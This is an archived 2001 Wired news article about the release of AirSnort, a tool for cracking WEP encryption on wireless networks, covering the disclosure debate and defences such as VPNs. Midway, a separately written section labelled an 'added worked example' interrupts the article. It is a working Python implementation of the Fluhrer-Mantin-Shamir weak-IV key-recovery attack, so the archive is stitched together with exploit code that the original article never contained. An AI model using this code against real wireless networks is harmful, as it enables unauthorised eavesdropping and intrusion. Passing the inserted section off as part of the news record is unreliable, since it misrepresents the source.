http://www.wired.com/news/wireless/0,1382,46187,00.html

By Michelle Delio
2:20 p.m. Aug. 20, 2001 PDT

Wireless networks are a little less secure today with the public release of "AirSnort," a tool that can surreptitiously capture and analyze data moving across just about every major wireless network. When enough traffic has been captured, AirSnort can piece together the network's secret key, the shared "master password" that every station on the network uses to encrypt its traffic. In other words, hackers and eavesdroppers using AirSnort can read whatever they want from a company's wireless traffic, out of thin air.

AirSnort's abilities aren't groundbreaking: security experts know all too well that wireless networks can be easily accessed and monitored by outsiders. But a fully featured tool that automates recovering the key wasn't readily available until this past weekend, when AirSnort was released on the Internet.

"AirSnort certainly ups the ante in the sense that with this tool, your 'encrypted wireless net' can be quickly and easily breached," said Randy Sandone of Argus, a security company. "Once AirSnort breaks the encryption, you're basically hosed. A malicious hacker can read any packet traveling over the network, gather information, passwords -- you name it."

Wireless networks transmit information over public airwaves, the same medium used by television, radio and cell phones. The networks are supposed to be protected by a built-in security feature, Wired Equivalent Privacy (WEP), the encryption scheme that the IEEE 802.11 standard (of which 802.11b is the variant in wide use) defines to scramble data as it is transmitted. But WEP has proved to be quite crackable.

And that's exactly why AirSnort was publicly released, said AirSnort programmers Jeremy Bruestle and Blake Hegerle. They hope that AirSnort will prove once and for all that wireless networks protected only by WEP are not secure.

"Yes, AirSnort can be used as a cracking tool, but it can also be used as a really big stick in an argument over the safety of WEP," Hegerle said.
"We felt that the only proper thing to do was to release the project," Bruestle said. "It is not obvious to the layman or the average administrator how vulnerable 802.11b is to attack. It's too easy to trust WEP. Honestly, there is a lot of work involved in hardening a wireless network. It's easy to be complacent. AirSnort is all about opening people's eyes."

Added Sandone: "Perhaps its release will prompt wireless vendors to significantly enhance the encryption of their products. And hopefully users will come to understand that encryption (regardless of how it is used) is not a panacea."

"Some people overhype the power of encryption, and others put too much faith in its 'mathematical precision.' It clearly has its value, but it shouldn't be the only security mechanism in use."

"Weaknesses in the Key Scheduling Algorithm of RC4," a recently published paper by Scott Fluhrer, Itsik Mantin and Adi Shamir, outlined a way to recover the secret key of a WEP-protected network from captured traffic, which would allow an intruder to decrypt that traffic and pose as a legitimate user of the network.

Adam Stubblefield, a Rice University undergraduate who was working as a summer intern at AT&T Labs, tested that attack (with the permission of the network's administrator) and was able to recover the network's key in just under two hours. Stubblefield published his research on the Internet, but did not release the program he used to access AT&T's wireless network.

If the software that he wrote to recover keys were published, Stubblefield told a reporter from The New York Times, anyone with a basic knowledge of computers and a wireless network card could easily crack many wireless networks.

"Basically I read the paper and wondered if the attack would actually work in the real world, and how hard it would be to implement," Bruestle said.
"I am the CEO of a small security firm, Cypher42, and I wanted to know just how difficult or easy it would be to implement the attack, so we could properly advise clients on 802.11b security."

Another tool, WEPcrack, was released on the Internet around the same time as AirSnort, but WEPcrack is still considered an alpha release, a work in progress. Bruestle and Hegerle's AirSnort is a beta release, a designation that indicates a program is not quite ready for prime time but is further along in features and stability than an alpha. Bruestle said he and Hegerle had a basic working version of AirSnort after less than 24 hours of programming time.

Bruestle said he has received many e-mails about AirSnort, some in favor of the public release of the tool, others accusing him of adding to malicious hackers' arsenal.

"Many of the people who have e-mailed me about AirSnort are sysadmins who thanked me for giving them a way to convince management that WEP really is insecure," Bruestle said. "Of course, I have gotten a number of flame mails too, comparing the release of AirSnort to 'giving guns to children.' I understand the viewpoint of those who believe dangerous information should be hidden, but I disagree."

Hegerle and Bruestle said that they believe that many people did not understand the academic nature of Fluhrer, Mantin and Shamir's paper, and may not understand how vulnerable wireless systems are.

"It was beyond even my humble attempts to understand (the paper's) full depths," Bruestle said. "The implications of a tool like AirSnort are much harder to deny than the paper it was based on."

AirSnort uses a completely passive attack: An AirSnort user needs only a Linux computer with a wireless network card, within radio range of whatever wireless network he or she wishes to crack; nothing is ever transmitted.
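How the passive attack turns captured frames into the key, as an added worked example (this is not AirSnort's, WEPcrack's or the Fluhrer-Mantin-Shamir paper's code): the Python script below simulates a WEP access point that, as 802.11 does, sends each frame's 24-bit IV in the clear and encrypts the frame with RC4 keyed by IV followed by the secret key, then runs the FMS attack over the captured (IV, first ciphertext byte) pairs. The attacker needs one known plaintext byte per frame, the 0xAA LLC/SNAP header that begins every 802.11 data frame, plus the paper's observation that for "resolved" IVs (the classic weak class is (A+3, 255, X) when attacking secret-key byte A) the first keystream byte reveals that key byte about 5% of the time. Each resolved frame casts one vote; the right byte accumulates votes while wrong bytes collect only noise, which is why the number of frames needed varies with the key and with luck. The secret key, the IV distribution (the constructed traffic is concentrated in the IV region where resolved IVs occur, so about ten thousand frames suffice where a real capture is mostly unusable IVs) and the verify-and-backtrack search over the top three candidates per byte are this example's own assumptions, not details from the article.

```python
"""FMS weak-IV key recovery against simulated WEP traffic.

Added example, not AirSnort's code.  Assumptions: a constructed 40-bit key,
constructed traffic whose IVs cluster in the region where resolved IVs occur,
and the known-plaintext byte 0xAA (LLC/SNAP DSAP) at the start of every frame.
"""
from collections import Counter

SNAP_DSAP = 0xAA  # first plaintext byte of every 802.11 data frame (LLC/SNAP header)


def rc4_first_keystream_byte(key):
    """Full RC4 key schedule over `key` (IV || secret key), then the first PRGA byte."""
    S = list(range(256))
    j = 0
    n = len(key)
    for i in range(256):
        j = (j + S[i] + key[i % n]) & 0xFF
        S[i], S[j] = S[j], S[i]
    j = S[1]                      # PRGA step i = 1
    S[1], S[j] = S[j], S[1]
    return S[(S[1] + S[j]) & 0xFF]


def wep_frame(iv, secret_key):
    """What the access point puts on the air: the IV in the clear, then 0xAA XOR keystream[0]."""
    return iv, SNAP_DSAP ^ rc4_first_keystream_byte(list(iv) + list(secret_key))


def simulate_capture(secret_key, second_bytes=range(248, 256)):
    """Constructed traffic: one frame for every IV (a, y, x) with a = 3 .. len(key)+2.
    IVs of the form (A+3, 255, x) and (A+3, 254, x) are resolved for secret-key byte A
    for most x; a real capture is mostly other IVs, which the attacker simply discards."""
    return [wep_frame((a, y, x), secret_key)
            for a in range(3, 3 + len(secret_key))
            for y in second_bytes
            for x in range(256)]


def fms_candidate(iv, ciphertext_byte, known_key):
    """Vote for secret-key byte number len(known_key), or None if the IV is not resolved.

    The attacker replays the KSA steps whose key bytes it knows (the 3 IV bytes plus the
    bytes already recovered).  If afterwards S[1] < A+3 and S[1] + S[S[1]] == A+3, then with
    probability about e^-3 (5%) the remaining KSA steps leave those cells alone and the first
    keystream byte equals the value swapped into S[A+3] at step A+3, which pins down K[A+3]."""
    A = len(known_key)
    K = list(iv) + list(known_key)
    S = list(range(256))
    j = 0
    for i in range(A + 3):
        j = (j + S[i] + K[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
    if S[1] >= A + 3 or (S[1] + S[S[1]]) & 0xFF != A + 3:
        return None
    keystream0 = ciphertext_byte ^ SNAP_DSAP      # known-plaintext assumption
    return (S.index(keystream0) - j - S[A + 3]) & 0xFF


def recover_key(capture, key_len, top=3):
    """Recover the key byte by byte from (iv, first ciphertext byte) pairs.

    Each resolved frame votes for one candidate; the correct byte collects about 5% of the
    votes, wrong ones only noise.  Because the margin depends on the key and on which IVs
    happened to be captured, the search backtracks over the `top` candidates per position
    and accepts a key only if it re-encrypts the first 32 captured frames correctly."""
    def verify(key):
        return all(wep_frame(iv, key)[1] == c for iv, c in capture[:32])

    def search(known):
        if len(known) == key_len:
            return known if verify(known) else None
        votes = Counter()
        for iv, c in capture:
            cand = fms_candidate(iv, c, known)
            if cand is not None:
                votes[cand] += 1
        for byte, _ in votes.most_common(top):
            found = search(known + [byte])
            if found is not None:
                return found
        return None

    return search([])


def demo():
    """Constructed 40-bit key; a 104-bit key falls to the same attack one byte at a time."""
    secret_key = [0x12, 0x34, 0x56, 0x78, 0x9A]
    capture = simulate_capture(secret_key)
    return secret_key, recover_key(capture, len(secret_key)), len(capture)


if __name__ == "__main__":
    secret, recovered, frames = demo()
    print("frames captured:", frames)
    print("true key       :", bytes(secret).hex())
    print("recovered key  :", "failed" if recovered is None else bytes(recovered).hex())
```

The attacker never transmits: everything it uses is the IV and the first ciphertext byte of frames the access point sends anyway, and the votes from different capture sessions simply add up, which is the property Bruestle describes when he says that five hours one day and five the next are as good as ten in a row.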
Many wireless networks allow amazingly easy access to unauthorized users, as some people have discovered when their laptops suddenly connect to the Internet while they are in or near a building that has a wireless network.

"I've been able to connect to networks when standing outside of businesses, hospitals or Internet cafés that offer the service," said Mark Denon, a freelance technology writer. "You can jump in and use the network to send e-mail or surf the Net, and often it's quite possible to access whatever information is moving across the network. It's very easy to piggyback onto many wireless networks, and some people make a game of driving or walking around a city and seeing how many networks they can jump into."

"A wireless card in the machine that's running AirSnort does not send out any data or actually talk with any of the other machines on the network," said Hegerle. "It simply listens to all the other traffic, so it doesn't matter if the network allows unauthorized access, as none of the other machines on the network will even know anyone is listening."

The amount of time required to piece together a key with AirSnort depends on a number of factors, Bruestle said, but mostly on the amount of network traffic and "luck."

"On a highly saturated network, AirSnort can usually collect enough packets to guess the key in three or four hours. If the network is very low traffic, it can take days to get enough data," Bruestle said. "Since the attack is based on probability, the actual number of packets required to guess a given key varies from key to key, sometimes significantly."

AirSnort monitoring does not have to be done all in one session, though. "Five hours one day and five the next works out to be about the same as 10 hours in a row," Bruestle said.

Systems administrators have mixed reactions to the release of AirSnort.
"Granted, this program will hammer the truth into people's heads about the insecure nature of any wireless network protected only by WEP," said Gerry Kaufman, a medical network and systems consultant. "But releasing this tool also allows a lot of people access to networks who couldn't have cracked them before. I'm really torn between advocating open access to information, and keeping tools like AirSnort out of the hands of kids with too much free time on their hands."

Kaufman said the "only good thing" that could come from AirSnort's release is its use for proving to "those who approve the expenditures" that wireless networks need stronger protection.

Hegerle and Bruestle suggest that wireless network users look into other, end-to-end forms of encryption, such as Virtual Private Networks (VPNs), to protect data going over wireless networks.

"While this requires more work, the false sense of security WEP offers is worse than no security at all," Bruestle said.

"Quite simply, I won't be happy until there are no people trusting their data to WEP as it now exists," Hegerle said. "There are several possible ways to change WEP, and I would like to see a new dialog begin, one that looks for a replacement to the badly designed WEP we are now stuck with."

Stronger replacements for WEP are under development in the 802.11 standards process, but the new standards won't be released until mid-2002 at the earliest.

ISN is currently hosted by Attrition.org
This archive was generated by hypermail 2b30 : Tue Aug 21 2001 - 04:09:16 PDT